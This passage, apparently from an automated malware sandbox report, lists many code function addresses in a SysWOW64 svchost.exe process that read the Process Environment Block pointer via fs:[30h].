            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C310 mov ecx, dword ptr fs:[00000030h]2_2_0342C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450310 mov ecx, dword ptr fs:[00000030h]2_2_03450310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov ecx, dword ptr fs:[00000030h]2_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC3CD mov eax, dword ptr fs:[00000030h]2_2_034EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B63C0 mov eax, dword ptr fs:[00000030h]2_2_034B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov ecx, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034663FF mov eax, dword ptr fs:[00000030h]2_2_034663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov eax, dword ptr fs:[00000030h]2_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov ecx, dword ptr fs:[00000030h]2_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350625D mov eax, dword ptr fs:[00000030h]2_2_0350625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A250 mov eax, dword ptr fs:[00000030h]2_2_0342A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436259 mov eax, dword ptr fs:[00000030h]2_2_03436259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342826B mov eax, dword ptr fs:[00000030h]2_2_0342826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342823B mov eax, dword ptr fs:[00000030h]2_2_0342823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035062D6 mov eax, dword ptr fs:[00000030h]2_2_035062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov ecx, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov ecx, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C156 mov eax, dword ptr fs:[00000030h]2_2_0342C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C8158 mov eax, dword ptr fs:[00000030h]2_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov ecx, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F0115 mov eax, dword ptr fs:[00000030h]2_2_034F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460124 mov eax, dword ptr fs:[00000030h]2_2_03460124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035061E5 mov eax, dword ptr fs:[00000030h]2_2_035061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034601F8 mov eax, dword ptr fs:[00000030h]2_2_034601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03470185 mov eax, dword ptr fs:[00000030h]2_2_03470185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432050 mov eax, dword ptr fs:[00000030h]2_2_03432050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6050 mov eax, dword ptr fs:[00000030h]2_2_034B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C073 mov eax, dword ptr fs:[00000030h]2_2_0345C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4000 mov ecx, dword ptr fs:[00000030h]2_2_034B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A020 mov eax, dword ptr fs:[00000030h]2_2_0342A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C020 mov eax, dword ptr fs:[00000030h]2_2_0342C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6030 mov eax, dword ptr fs:[00000030h]2_2_034C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B20DE mov eax, dword ptr fs:[00000030h]2_2_034B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0342A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034380E9 mov eax, dword ptr fs:[00000030h]2_2_034380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B60E0 mov eax, dword ptr fs:[00000030h]2_2_034B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C0F0 mov eax, dword ptr fs:[00000030h]2_2_0342C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034720F0 mov ecx, dword ptr fs:[00000030h]2_2_034720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343208A mov eax, dword ptr fs:[00000030h]2_2_0343208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034280A0 mov eax, dword ptr fs:[00000030h]2_2_034280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C80A8 mov eax, dword ptr fs:[00000030h]2_2_034C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov eax, dword ptr fs:[00000030h]2_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov ecx, dword ptr fs:[00000030h]2_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov esi, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430750 mov eax, dword ptr fs:[00000030h]2_2_03430750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE75D mov eax, dword ptr fs:[00000030h]2_2_034BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4755 mov eax, dword ptr fs:[00000030h]2_2_034B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438770 mov eax, dword ptr fs:[00000030h]2_2_03438770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C700 mov eax, dword ptr fs:[00000030h]2_2_0346C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430710 mov eax, dword ptr fs:[00000030h]2_2_03430710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460710 mov eax, dword ptr fs:[00000030h]2_2_03460710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov ecx, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AC730 mov eax, dword ptr fs:[00000030h]2_2_034AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C0 mov eax, dword ptr fs:[00000030h]2_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B07C3 mov eax, dword ptr fs:[00000030h]2_2_034B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE7E1 mov eax, dword ptr fs:[00000030h]2_2_034BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D678E mov eax, dword ptr fs:[00000030h]2_2_034D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034307AF mov eax, dword ptr fs:[00000030h]2_2_034307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E47A0 mov eax, dword ptr fs:[00000030h]2_2_034E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344C640 mov eax, dword ptr fs:[00000030h]2_2_0344C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03462674 mov eax, dword ptr fs:[00000030h]2_2_03462674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE609 mov eax, dword ptr fs:[00000030h]2_2_034AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472619 mov eax, dword ptr fs:[00000030h]2_2_03472619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E627 mov eax, dword ptr fs:[00000030h]2_2_0344E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03466620 mov eax, dword ptr fs:[00000030h]2_2_03466620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468620 mov eax, dword ptr fs:[00000030h]2_2_03468620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343262C mov eax, dword ptr fs:[00000030h]2_2_0343262C
